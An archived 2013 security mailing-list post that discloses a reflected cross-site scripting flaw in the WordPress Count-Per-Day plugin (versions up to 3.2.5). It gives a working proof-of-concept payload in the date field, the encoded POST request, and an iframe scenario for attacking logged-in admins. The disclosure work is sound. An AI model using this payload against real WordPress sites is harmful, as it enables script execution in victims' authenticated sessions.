lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAECkP=xKdDpajCXjg4NAke3NLpGpetK7iOKXdKZB4CY7d9WEyQ@mail.gmail.com>
Date: Tue, 5 Mar 2013 10:35:43 +0100
From: alej andr0 <alejandr0.m0f0@...il.com>
To: undisclosed-recipients: ;
Subject: WordPress Count-Per-Day plugin 3.2.5. Type-1 (reflected) Cross Site
 Scripting (XSS)

#------------------
# WordPress Count-Per-Day plugin 3.2.5. Type-1 (reflected) Cross Site
Scripting (XSS)
#
# affected versions <= 3.2.5. (tested on 3.2.5, 3.2.3)
#
# impact:
# - code execution in browser context
#
# author: alejandr0.m0f0

1/ navigate to the page:
/wordpress/wp-admin/?page=cpd_metaboxes

2/ bottom of the page: "visitors per day"
current date is printed (e.g., 2013-03-04)
replace this field by
2013-03-04"><img src=x onerror=alert(1)>
press show.

3/ request is submitted, server reflects the sent value. filter on
server side is identity, thus pretty easy to exploit.
the payload gets executed.
----------
e.g., of exploitation:
-------------------
POST .../wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1
...

daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show
-------------------
# requirements: victim should be authenticated as user having access
to this plugin (e.g., admin)
# this is still a practical attack in case e.g. attacker embeds an
iframe on a website he controls, and assuming the victim is logged in
wordpress, then the SOP access control is bypassed.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ